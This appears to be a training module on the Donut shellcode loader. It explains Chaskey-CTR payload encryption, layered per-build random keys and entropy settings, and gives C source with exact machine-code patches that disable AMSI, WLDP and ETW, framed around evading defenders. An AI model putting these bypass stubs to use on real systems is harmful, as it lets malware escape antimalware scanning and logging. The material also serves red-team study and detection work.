Difficulty: Intermediate

Module 6: Encryption & Anti-Detection

Chaskey block cipher internals, random key generation, entropy control, and the AMSI/WLDP/ETW bypass stubs built into the Donut loader.

Module Objective

Understand how Donut protects the payload using the Chaskey lightweight block cipher in CTR mode, how random keys and nonces are generated per-shellcode, how entropy levels control the randomization of strings, and exactly how the AMSI, WLDP, and ETW bypass stubs work at the machine code level.

1. The Chaskey Block Cipher

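Donut uses Chaskey, a lightweight ARX design that Nicky Mouha and co-authors published as a MAC algorithm for 32-bit microcontrollers; Donut uses its underlying block cipher. The comparison with AES-128 and RC4 shows why it suits position-independent code: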

| Property | Chaskey | AES-128 | RC4 |
| --- | --- | --- | --- |
| Block size | 128 bits | 128 bits | Stream cipher |
| Key size | 128 bits | 128 bits | 40-2048 bits |
| Operations | ARX only | SubBytes, ShiftRows, etc. | PRGA |
| Code size (PIC) | ~200 bytes | ~2-4 KB (with tables) | ~100 bytes |
| MAC support | Built-in | Requires HMAC wrapper | No |

2. Chaskey Internals

Chaskey operates on four 32-bit words (v0, v1, v2, v3) and applies a permutation round function. Donut uses the 16-round variant, known as Chaskey-LTS, and applies it as a block cipher rather than as a MAC:

// Chaskey permutation round (from encrypt.c)
// Four 32-bit state words, ARX operations only
#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))
#define ROUND(v0, v1, v2, v3) \
    v0 += v1; v1 = ROTR32(v1, 27); v1 ^= v0;                       \
    v2 += v3; v3 = ROTR32(v3, 24); v3 ^= v2;                       \
    v2 += v1; v0 = ROTR32(v0, 16) + v3;                             \
    v3 = ROTR32(v3, 19); v3 ^= v0;                                  \
    v1 = ROTR32(v1, 25); v1 ^= v2; v2 = ROTR32(v2, 16);

// Full Chaskey encryption of one 128-bit block
void chaskey_block(DWORD key[4], DWORD data[4]) {
    DWORD v0 = data[0] ^ key[0];
    DWORD v1 = data[1] ^ key[1];
    DWORD v2 = data[2] ^ key[2];
    DWORD v3 = data[3] ^ key[3];

    // 16 rounds of permutation (Chaskey-LTS)
    for (int i = 0; i < 16; i++) {
        ROUND(v0, v1, v2, v3);
    }

    data[0] = v0 ^ key[0];
    data[1] = v1 ^ key[1];
    data[2] = v2 ^ key[2];
    data[3] = v3 ^ key[3];
}
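
Every step in the round (modular addition, rotation, XOR) can be undone, which is what makes the block function a keyed permutation. The following is a minimal sketch of that observation, not Donut's code: it restates the round with uint32_t and adds an inverse. The names chaskey_unround, chaskey_block_inv, and chaskey_roundtrip_ok are illustrative assumptions; Donut itself never needs the inverse because CTR mode only runs the cipher forward.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))
#define ROTL32(v, n) (((v) << (n)) | ((v) >> (32 - (n))))

/* One forward round, same step order as the ROUND macro above. */
static void chaskey_round(uint32_t v[4]) {
    v[0] += v[1]; v[1] = ROTR32(v[1], 27) ^ v[0];
    v[2] += v[3]; v[3] = ROTR32(v[3], 24) ^ v[2];
    v[2] += v[1]; v[0] = ROTR32(v[0], 16) + v[3];
    v[3] = ROTR32(v[3], 19) ^ v[0];
    v[1] = ROTR32(v[1], 25) ^ v[2];
    v[2] = ROTR32(v[2], 16);
}

/* Hypothetical inverse: undo each step of the round in reverse order. */
static void chaskey_unround(uint32_t v[4]) {
    v[2] = ROTL32(v[2], 16);
    v[1] = ROTL32(v[1] ^ v[2], 25);
    v[3] = ROTL32(v[3] ^ v[0], 19);
    v[0] = ROTL32(v[0] - v[3], 16);
    v[2] -= v[1];
    v[3] = ROTL32(v[3] ^ v[2], 24);
    v[2] -= v[3];
    v[1] = ROTL32(v[1] ^ v[0], 27);
    v[0] -= v[1];
}

/* XOR key, 16 rounds, XOR key again. */
void chaskey_block(const uint32_t key[4], uint32_t data[4]) {
    for (int i = 0; i < 4; i++) data[i] ^= key[i];
    for (int i = 0; i < 16; i++) chaskey_round(data);
    for (int i = 0; i < 4; i++) data[i] ^= key[i];
}

/* Hypothetical inverse of chaskey_block. */
void chaskey_block_inv(const uint32_t key[4], uint32_t data[4]) {
    for (int i = 0; i < 4; i++) data[i] ^= key[i];
    for (int i = 0; i < 16; i++) chaskey_unround(data);
    for (int i = 0; i < 4; i++) data[i] ^= key[i];
}

/* Returns 1 if the block changes under encryption and is restored by the inverse. */
int chaskey_roundtrip_ok(void) {
    const uint32_t key[4]   = {0x01234567u, 0x89abcdefu, 0xfedcba98u, 0x76543210u};
    const uint32_t plain[4] = {1, 2, 3, 4};
    uint32_t buf[4];

    memcpy(buf, plain, sizeof buf);
    chaskey_block(key, buf);
    int changed = memcmp(buf, plain, sizeof buf) != 0;
    chaskey_block_inv(key, buf);
    return changed && memcmp(buf, plain, sizeof buf) == 0;
}
```

Calling chaskey_roundtrip_ok() is a quick way to confirm that a hand-ported round function has its rotation amounts and step order right.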

3. CTR Mode Operation

Donut uses Chaskey in Counter (CTR) mode, which turns the block cipher into a stream cipher. This matters because the payload length is rarely a multiple of the 16-byte block size:

// Chaskey-CTR encryption/decryption (same operation)
void chaskey_encrypt(BYTE key[16], BYTE ctr[16], BYTE *data, DWORD len) {
    DWORD blocks = (len + 15) / 16;  // Round up to full blocks
    BYTE  keystream[16];

    for (DWORD i = 0; i < blocks; i++) {
        // Encrypt the counter to produce keystream
        memcpy(keystream, ctr, 16);
        chaskey_block((DWORD*)key, (DWORD*)keystream);

        // XOR keystream with data
        DWORD remaining = (i == blocks - 1) ? (len % 16 ? len % 16 : 16) : 16;
        for (DWORD j = 0; j < remaining; j++) {
            data[i * 16 + j] ^= keystream[j];
        }

        // Increment the counter
        for (int j = 15; j >= 0; j--) {
            if (++ctr[j]) break;  // Increment with carry
        }
    }
}

Why CTR Mode?

CTR mode has several advantages for shellcode: (1) encryption and decryption are the same operation (XOR with keystream), reducing code size; (2) no padding is needed since any length of data can be processed; (3) it is parallelizable, though Donut’s implementation is sequential for simplicity.
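
To make these properties concrete, here is a self-contained sketch of CTR mode over the 16-round block function. It uses uint8_t/uint32_t instead of the Windows types, and ctr_crypt and ctr_roundtrip_ok are hypothetical names rather than Donut's. The demo encrypts a 37-byte message (not a multiple of 16), checks that the counter carried from byte 15 into byte 14, then resets the counter and applies the same function again to decrypt.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))

/* 16-round Chaskey block function, as described in section 2. */
static void chaskey_block(const uint32_t k[4], uint32_t v[4]) {
    int i;
    for (i = 0; i < 4; i++) v[i] ^= k[i];
    for (i = 0; i < 16; i++) {
        v[0] += v[1]; v[1] = ROTR32(v[1], 27) ^ v[0];
        v[2] += v[3]; v[3] = ROTR32(v[3], 24) ^ v[2];
        v[2] += v[1]; v[0] = ROTR32(v[0], 16) + v[3];
        v[3] = ROTR32(v[3], 19) ^ v[0];
        v[1] = ROTR32(v[1], 25) ^ v[2];
        v[2] = ROTR32(v[2], 16);
    }
    for (i = 0; i < 4; i++) v[i] ^= k[i];
}

/* XOR data with the keystream E(key, ctr), E(key, ctr+1), ...
   The counter is treated as a big-endian integer and updated in place. */
void ctr_crypt(const uint8_t key[16], uint8_t ctr[16], uint8_t *data, size_t len) {
    uint32_t k[4], x[4];
    uint8_t ks[16];

    memcpy(k, key, 16);                 /* memcpy avoids unaligned word access */
    while (len > 0) {
        size_t n = len < 16 ? len : 16; /* last block may be partial */
        memcpy(x, ctr, 16);
        chaskey_block(k, x);
        memcpy(ks, x, 16);
        for (size_t i = 0; i < n; i++) data[i] ^= ks[i];
        data += n;
        len -= n;
        for (int j = 15; j >= 0; j--) {
            if (++ctr[j]) break;        /* stop once a byte does not wrap to 0 */
        }
    }
}

/* Returns 1 if encrypt-then-decrypt restores the message. */
int ctr_roundtrip_ok(void) {
    const uint8_t key[16]  = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15};
    const uint8_t ctr0[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF};
    const char msg[] = "not a multiple of sixteen bytes long!";
    size_t len = sizeof msg - 1;        /* 37 bytes, so three blocks */
    uint8_t buf[64], ctr[16];

    assert(len <= sizeof buf);
    memcpy(buf, msg, len);
    memcpy(ctr, ctr0, 16);
    ctr_crypt(key, ctr, buf, len);
    int scrambled = memcmp(buf, msg, len) != 0;
    int carried = (ctr[14] == 1 && ctr[15] == 2);  /* 0x00FF + 3 = 0x0102 */

    memcpy(ctr, ctr0, 16);              /* decryption must restart from the same counter */
    ctr_crypt(key, ctr, buf, len);
    return scrambled && carried && memcmp(buf, msg, len) == 0;
}
```

Because the counter is modified in place, a caller that wants to decrypt later has to keep a copy of the starting value, which is why the demo restores ctr from ctr0 before the second call.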

4. Dual-Layer Encryption

Donut applies encryption at two levels, each with independent keys:

Encryption Layers

MODULE data (raw payload + metadata) -> Encrypt (Key 2: mod_key + mod_ctr)
INSTANCE (contains Key 2 + hashes) -> Encrypt (Key 1: inst key + inst ctr)

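Layer 1 (inner, Key 2): The DONUT_MODULE is encrypted with mod_key / mod_ctr. This key and counter are stored inside DONUT_INSTANCE.

Layer 2 (outer, Key 1): The DONUT_INSTANCE itself is encrypted with a separate key/counter pair (inst->key and inst->ctr in the generation code). This material is generated at build time and has to ship with the shellcode so that the loader can decrypt the instance at run time.

Anyone who lacks the instance key cannot decrypt the instance and, without the instance, cannot recover the module key or decrypt the module. The layers therefore form a chain of dependencies. Because the outer key travels with the shellcode, the scheme defeats static signatures rather than an analyst who holds the complete shellcode.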
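
The ordering of the two layers can be illustrated with a toy model. This is only a sketch: toy_crypt is a stand-in XOR stream, not Chaskey, and toy_instance, toy_module, toy_wrap, and toy_unwrap are hypothetical, heavily simplified names that do not match Donut's real structures. It shows that the module key is only usable after the outer layer has been removed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Stand-in stream cipher (NOT Chaskey): XOR with a key-dependent byte stream.
   Applying it twice with the same key restores the input. */
static void toy_crypt(const uint8_t key[16], uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        buf[i] ^= (uint8_t)(key[i % 16] + (uint8_t)i);
}

/* Hypothetical, simplified layouts; the real structures hold many more fields. */
typedef struct { uint8_t payload[32]; } toy_module;
typedef struct { uint8_t mod_key[16]; } toy_instance;

/* Build time: encrypt the module with mod_key (inner layer),
   then encrypt the instance that holds mod_key (outer layer). */
void toy_wrap(const uint8_t inst_key[16], toy_instance *inst, toy_module *mod) {
    toy_crypt(inst->mod_key, mod->payload, sizeof mod->payload);
    toy_crypt(inst_key, inst->mod_key, sizeof inst->mod_key);
}

/* Load time: the reverse order. The outer layer must come off first. */
void toy_unwrap(const uint8_t inst_key[16], toy_instance *inst, toy_module *mod) {
    toy_crypt(inst_key, inst->mod_key, sizeof inst->mod_key);
    toy_crypt(inst->mod_key, mod->payload, sizeof mod->payload);
}

/* Returns 1 if skipping the outer layer fails and the full unwrap succeeds. */
int toy_layers_ok(void) {
    const uint8_t inst_key[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
    toy_instance inst;
    toy_module plain, mod, wrong;

    for (int i = 0; i < 16; i++) inst.mod_key[i] = (uint8_t)(0xA0 + i);
    memset(plain.payload, 0x41, sizeof plain.payload);
    mod = plain;
    toy_wrap(inst_key, &inst, &mod);

    /* Using the still-encrypted mod_key directly does not recover the payload. */
    wrong = mod;
    toy_crypt(inst.mod_key, wrong.payload, sizeof wrong.payload);
    int skipped_fails = memcmp(wrong.payload, plain.payload, sizeof plain.payload) != 0;

    toy_unwrap(inst_key, &inst, &mod);
    return skipped_fails && memcmp(mod.payload, plain.payload, sizeof plain.payload) == 0;
}
```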

5. Random Key Generation

Every time Donut generates shellcode, all cryptographic material is freshly randomized:

// During generation (donut.c), keys are randomly generated
// Using the OS CSPRNG for each shellcode generation

// Instance-level keys
if (!CryptGenRandom(prov, CIPHER_KEY_LEN, inst->key))
    return DONUT_ERROR_RANDOM;
if (!CryptGenRandom(prov, CIPHER_BLK_LEN, inst->ctr))
    return DONUT_ERROR_RANDOM;

// Module-level keys (stored inside the instance)
if (!CryptGenRandom(prov, CIPHER_KEY_LEN, inst->mod_key))
    return DONUT_ERROR_RANDOM;
if (!CryptGenRandom(prov, CIPHER_BLK_LEN, inst->mod_ctr))
    return DONUT_ERROR_RANDOM;

This means that generating shellcode from the same payload twice produces completely different output. There is no static key or nonce that defenders can use to create a universal decryption rule.
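
The excerpt above relies on the Windows CryptGenRandom API. For readers on other platforms, a rough equivalent can be sketched on top of /dev/urandom. Everything here is an assumption for illustration: fill_random, key_pair, generate_pair, and fresh_pairs_differ are hypothetical names, the 16-byte lengths mirror the 128-bit key and block sizes from section 1, and the code presumes /dev/urandom exists.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CIPHER_KEY_LEN 16   /* assumed: 128-bit key   */
#define CIPHER_BLK_LEN 16   /* assumed: 128-bit block */

/* Hypothetical container for one key/counter pair. */
typedef struct {
    uint8_t key[CIPHER_KEY_LEN];
    uint8_t ctr[CIPHER_BLK_LEN];
} key_pair;

/* Fill buf with len bytes from the OS random source.
   Returns 1 on success, 0 on any failure. */
int fill_random(void *buf, size_t len) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL) return 0;
    size_t got = fread(buf, 1, len, f);
    fclose(f);
    return got == len;
}

/* Generate a fresh key and counter; fail if either read fails. */
int generate_pair(key_pair *kp) {
    return fill_random(kp->key, sizeof kp->key) &&
           fill_random(kp->ctr, sizeof kp->ctr);
}

/* Returns 1 if two independently generated pairs differ. */
int fresh_pairs_differ(void) {
    key_pair a, b;
    if (!generate_pair(&a) || !generate_pair(&b)) return 0;
    return memcmp(&a, &b, sizeof a) != 0;
}
```

As in the original excerpt, a failed read is treated as a hard error instead of falling back to a weaker source, since a predictable key would undo the per-build randomization.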

6. Entropy Levels

Donut provides configurable entropy levels that control two things: whether names in the shellcode are randomized, and whether the instance and module are encrypted:

| Level | Constant | Behavior |
| --- | --- | --- |
| None | DONUT_ENTROPY_NONE | No encryption, no random strings. Useful for debugging. Payload is plaintext. |
| Random Names | DONUT_ENTROPY_RANDOM | Random AppDomain names, random module names, but no encryption |
| Full (Default) | DONUT_ENTROPY_DEFAULT | Random keys, random names, full Chaskey encryption of instance and module |

Entropy None = Completely Exposed

Setting entropy to DONUT_ENTROPY_NONE disables all encryption and randomization. The payload sits in plaintext inside the shellcode. This is only useful for development and debugging — never use it in an operational context.
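
The three levels reduce to two independent switches. The sketch below encodes them as a small lookup, assuming the numeric values 1, 2, and 3 for the constants; those values, the entropy_plan type, and plan_for_entropy are illustrative assumptions and should be checked against donut.h before being relied on.

```c
#include <assert.h>
#include <stdbool.h>

/* Assumed numeric values; verify against donut.h. */
enum {
    DONUT_ENTROPY_NONE    = 1,
    DONUT_ENTROPY_RANDOM  = 2,
    DONUT_ENTROPY_DEFAULT = 3
};

/* Hypothetical summary of what a level turns on. */
typedef struct {
    bool random_names;  /* randomize AppDomain and module names   */
    bool encrypt;       /* Chaskey-encrypt the instance and module */
} entropy_plan;

/* Fills *out for a known level and returns true; returns false otherwise. */
bool plan_for_entropy(int level, entropy_plan *out) {
    switch (level) {
    case DONUT_ENTROPY_NONE:
        out->random_names = false; out->encrypt = false; return true;
    case DONUT_ENTROPY_RANDOM:
        out->random_names = true;  out->encrypt = false; return true;
    case DONUT_ENTROPY_DEFAULT:
        out->random_names = true;  out->encrypt = true;  return true;
    default:
        return false;   /* unknown level: leave *out untouched */
    }
}
```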

7. AMSI Bypass

The Antimalware Scan Interface (AMSI) is integrated into the .NET CLR (from .NET Framework 4.8 onward), PowerShell, VBScript, and JScript engines. When Assembly::Load is called, the CLR passes the assembly bytes to AmsiScanBuffer. Donut patches this function before loading the payload:

// bypass.c - AMSI bypass via AmsiScanBuffer patching
// The bypass writes a stub that makes AmsiScanBuffer return before any scan runs

BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    HMODULE amsi = inst->api.LoadLibraryA("amsi.dll");
    if (amsi == NULL) return TRUE;  // AMSI not loaded = nothing to bypass

    // Find AmsiScanBuffer
    FARPROC scan = inst->api.GetProcAddress(amsi, "AmsiScanBuffer");
    if (scan == NULL) return FALSE;

    // Make the function writable
    DWORD old;
    inst->api.VirtualProtect(scan, 8, PAGE_READWRITE, &old);

    // Overwrite the first bytes with a stub
    // x64: returns S_OK without writing the result out-parameter
    // x86: returns E_INVALIDARG (caller skips the scan)
    #if defined(_WIN64)
        // xor eax, eax ; ret  (return S_OK)
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };
    #else
        // mov eax, 0x80070057 ; ret 0x18
        BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
    #endif

    memcpy(scan, patch, sizeof(patch));

    // Restore original protection
    inst->api.VirtualProtect(scan, 8, old, &old);
    return TRUE;
}

How the AMSI Patch Works

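On x64, the patch replaces the first bytes of AmsiScanBuffer with xor eax, eax; ret, so the function returns S_OK (HRESULT 0) immediately and never writes the AMSI_RESULT out-parameter. The caller sees no detection as long as its result variable still holds its initial value, which is normally the case when it was initialized to 0 (AMSI_RESULT_CLEAN). On x86, the stub returns E_INVALIDARG (0x80070057) and pops the six stack arguments with ret 0x18, which causes the caller to skip the scan. Either way, the assembly bytes are never actually scanned.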
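
The x86 stub bytes can be read by hand, and a few lines of C make the arithmetic explicit. This is a minimal sketch: decode_mov_ret and amsi_x86_stub_matches are hypothetical helpers that only recognize the exact pattern "mov eax, imm32; ret imm16" (opcode B8 followed by a little-endian 32-bit immediate, then C2 followed by a little-endian 16-bit immediate).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode "mov eax, imm32 ; ret imm16" from the first 8 bytes of p.
   Returns 1 and fills the outputs on a match, 0 otherwise. */
int decode_mov_ret(const uint8_t *p, size_t len,
                   uint32_t *imm32, uint16_t *pop_bytes) {
    if (len < 8 || p[0] != 0xB8 || p[5] != 0xC2) return 0;
    *imm32 = (uint32_t)p[1]
           | ((uint32_t)p[2] << 8)
           | ((uint32_t)p[3] << 16)
           | ((uint32_t)p[4] << 24);          /* little-endian immediate */
    *pop_bytes = (uint16_t)(p[6] | (p[7] << 8));
    return 1;
}

/* Returns 1 if the x86 patch bytes decode to E_INVALIDARG and a 24-byte pop. */
int amsi_x86_stub_matches(void) {
    const uint8_t stub[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
    uint32_t hr;
    uint16_t pop;

    if (!decode_mov_ret(stub, sizeof stub, &hr, &pop)) return 0;
    /* 0x80070057 is E_INVALIDARG; 24 bytes = 6 stdcall arguments * 4 bytes. */
    return hr == 0x80070057u && pop == 24 && pop / 4 == 6;
}
```

The 24-byte pop is what keeps the stack balanced under the x86 stdcall convention, where the callee removes its own arguments.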

8. WLDP Bypass

The Windows Lockdown Policy (WLDP) controls which COM objects and scripts can be instantiated. On systems with Device Guard or WDAC, WLDP can block Donut’s script execution. The bypass patches WldpQueryDynamicCodeTrust and WldpIsClassInApprovedList:

// WLDP bypass - patch WldpQueryDynamicCodeTrust and WldpIsClassInApprovedList
BOOL DisableWLDP(PDONUT_INSTANCE inst) {
    HMODULE wldp = inst->api.LoadLibraryA("wldp.dll");
    if (wldp == NULL) return TRUE;  // WLDP not present

    // Patch WldpQueryDynamicCodeTrust to return S_OK
    FARPROC trust = inst->api.GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if (trust) {
        DWORD old;
        inst->api.VirtualProtect(trust, 8, PAGE_READWRITE, &old);
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };  // xor eax, eax; ret
        memcpy(trust, patch, sizeof(patch));
        inst->api.VirtualProtect(trust, 8, old, &old);
    }

    // Patch WldpIsClassInApprovedList to return S_OK
    FARPROC approved = inst->api.GetProcAddress(wldp, "WldpIsClassInApprovedList");
    if (approved) {
        DWORD old;
        inst->api.VirtualProtect(approved, 16, PAGE_READWRITE, &old);
        // This stub only returns S_OK; it does not write the output BOOL,
        // so the caller sees whatever value that variable already held
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };
        memcpy(approved, patch, sizeof(patch));
        inst->api.VirtualProtect(approved, 16, old, &old);
    }
    return TRUE;
}

9. ETW Bypass

Event Tracing for Windows (ETW) can log .NET assembly loading events that reveal Donut payloads to defenders. Donut optionally patches EtwEventWrite in ntdll.dll to suppress these events:

// ETW bypass - patch EtwEventWrite to return immediately
BOOL DisableETW(PDONUT_INSTANCE inst) {
    // ntdll.dll is always loaded
    HMODULE ntdll = inst->api.GetModuleHandleA("ntdll.dll");

    FARPROC etw = inst->api.GetProcAddress(ntdll, "EtwEventWrite");
    if (etw == NULL) return FALSE;

    DWORD old;
    #if defined(_WIN64)
        // x64: single RET instruction (return immediately, no events written)
        inst->api.VirtualProtect(etw, 1, PAGE_EXECUTE_READWRITE, &old);
        BYTE patch[] = { 0xC3 };
        memcpy(etw, patch, sizeof(patch));
        inst->api.VirtualProtect(etw, 1, old, &old);
    #else
        // x86: RET 0x14 (clean up 20 bytes of stack arguments)
        inst->api.VirtualProtect(etw, 4, PAGE_EXECUTE_READWRITE, &old);
        BYTE patch[] = { 0xC2, 0x14, 0x00, 0x00 };
        memcpy(etw, patch, sizeof(patch));
        inst->api.VirtualProtect(etw, 4, old, &old);
    #endif
    return TRUE;
}

Bypass Levels

Donut’s bypass configuration in DONUT_INSTANCE supports three levels: DONUT_BYPASS_NONE (no bypasses, payload may be caught), DONUT_BYPASS_ABORT (attempt bypass; if it fails, abort execution), and DONUT_BYPASS_CONTINUE (attempt bypass; if it fails, continue anyway).
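
The three levels amount to a small decision table over "was a bypass attempted" and "did it succeed". The sketch below expresses that table in C. The numeric values of the constants, the bypass_action type, and the decide_bypass function are assumptions for illustration, and treating an unknown level as an abort is a choice made here, not documented Donut behavior.

```c
#include <assert.h>

/* Assumed numeric values; verify against donut.h. */
enum {
    DONUT_BYPASS_NONE     = 1,
    DONUT_BYPASS_ABORT    = 2,
    DONUT_BYPASS_CONTINUE = 3
};

/* Hypothetical outcome of the decision. */
typedef enum {
    ACTION_SKIP,     /* do not attempt any bypass, load the payload */
    ACTION_PROCEED,  /* bypass attempted, go on to load the payload */
    ACTION_ABORT     /* bypass failed and the level forbids going on */
} bypass_action;

/* level: one of the DONUT_BYPASS_* values.
   bypass_succeeded: nonzero if the patches were applied successfully. */
bypass_action decide_bypass(int level, int bypass_succeeded) {
    switch (level) {
    case DONUT_BYPASS_NONE:
        return ACTION_SKIP;
    case DONUT_BYPASS_ABORT:
        return bypass_succeeded ? ACTION_PROCEED : ACTION_ABORT;
    case DONUT_BYPASS_CONTINUE:
        return ACTION_PROCEED;   /* failure is tolerated at this level */
    default:
        return ACTION_ABORT;     /* unknown level: conservative choice in this sketch */
    }
}
```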

Knowledge Check

1. Why was Chaskey chosen over AES for Donut’s payload encryption?

Chaskey uses only ARX (Add, Rotate, XOR) operations with no S-boxes or lookup tables, making it extremely compact. An AES implementation requires 2-4 KB of code and data for its substitution tables, which is significant overhead in PIC shellcode where every byte matters.

2. What does the AMSI bypass patch do to AmsiScanBuffer on x64?

The patch writes xor eax, eax; ret (3 bytes: 0x31 0xC0 0xC3) at the start of AmsiScanBuffer. This makes the function immediately return 0 (S_OK), which the CLR interprets as a clean scan result. The assembly bytes are never actually examined by the AMSI provider.

3. Why does Donut use two separate encryption layers with independent keys?

The dual-layer design means the DONUT_INSTANCE must be decrypted first (using Key 1, which ships with the shellcode so the loader can use it) to obtain Key 2, which is needed to decrypt the DONUT_MODULE containing the actual payload. Neither layer alone reveals the payload.